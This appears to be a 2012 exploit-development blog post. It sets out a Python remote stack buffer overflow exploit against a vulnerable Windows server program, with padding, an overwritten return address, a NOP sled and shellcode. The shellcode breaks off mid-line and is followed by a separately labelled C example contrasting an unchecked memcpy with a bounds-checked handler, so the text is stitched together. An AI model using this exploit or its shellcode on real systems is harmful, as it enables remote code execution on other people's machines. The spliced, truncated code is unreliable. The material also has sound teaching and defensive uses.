Posts

Showing posts from February, 2012

Windows Exploit Development Remote Stack BoF

This time I made a video about the basic exploit development process on Windows. The target machine is a Windows Server 2003 R2 with DEP disabled, running a vulnerable program called vserver. Basically, the vulnerable program listens on TCP port 15000 waiting for input, and if you provide a string longer than 15 characters it will crash.

Here is vserver:

- vserver download

Exploit code:

    #!/usr/bin/python
    #
    import socket

    junk = b'A' * 54
    eip = b'\x81\x42\x38\x77'
    nops = b'\x90' * 25
    shellcode = b'\xbe\xb6\x17\xb0\xd8\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9'
    shellcode += b'\xb1\x4f\x83\xc0\x04\x31\x70\x10\x03\x70\x10\x54\xe2\x4c'
    shellcode += b'\x30\x11\x0d\xad\xc1\x41\x87\x48\xf0\x53\xf3\x19\xa1\x63'
    shellcode += b'\x77\x4f\x4a\x08\xd5\x64\xd9\x7c\xf2\x8b\x6a\xca\x24\xa5'
    shellcode += b'\x6b\xfb\xe8\x69\xaf\x9a\x94\x73\xfc\x7c\xa4\xbb\xf1\x7d'
    shellcode += b'\xe1\xa6\xfa\x2f\xba\xad\xa9\xdf\xcf\xf0\x71\xde\x1f
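
For contrast with the exploit above, an added example (not from the original post, and not vserver's source) of the defensive fix in C: an assumed unchecked copy into a 16-byte stack buffer beside a receive handler that caps the running total at 15 bytes. `MAX_INPUT`, `handle_unsafe`, `struct conn`, `conn_init` and `conn_feed` are hypothetical names, and the buffer size is an assumption drawn from the post's 15-character crash threshold.

```c
#include <stdio.h>
#include <string.h>

#define MAX_INPUT 15   /* assumed limit, taken from the post's "15 characters" */

/* Assumed vulnerable pattern (not vserver's real source), for contrast only:
 * the copy length comes from the sender, not from the destination buffer. */
void handle_unsafe(const char *net, size_t len)
{
    char buf[MAX_INPUT + 1];
    memcpy(buf, net, len);   /* len > 16 runs past buf into the saved frame */
}

/* Hardened form: per-connection buffer with an explicit fill count. */
struct conn {
    char   buf[MAX_INPUT + 1];
    size_t used;             /* invariant: used <= MAX_INPUT */
};

void conn_init(struct conn *c) { c->used = 0; c->buf[0] = '\0'; }

/* Append one received chunk. Returns 0 on success, -1 when the running total
 * would exceed MAX_INPUT; the buffer is then unchanged (reject, never truncate). */
int conn_feed(struct conn *c, const char *chunk, size_t n)
{
    if (c == NULL || (chunk == NULL && n != 0))
        return -1;
    if (n > MAX_INPUT - c->used)   /* subtraction form cannot wrap around */
        return -1;
    if (n != 0)
        memcpy(c->buf + c->used, chunk, n);
    c->used += n;
    c->buf[c->used] = '\0';
    return 0;
}

int main(void)
{
    char big[54];            /* constructed input, same length as the post's junk */
    struct conn c;
    memset(big, 'A', sizeof big);
    conn_init(&c);
    printf("15 bytes: %d\n", conn_feed(&c, "AAAAAAAAAAAAAAA", 15));
    printf("1 more:   %d\n", conn_feed(&c, "A", 1));
    conn_init(&c);
    printf("54 bytes: %d\n", conn_feed(&c, big, sizeof big));
    return 0;
}
```

Tracking the running total matters because TCP can deliver one oversized message as several small reads, each of which would pass a per-read length check.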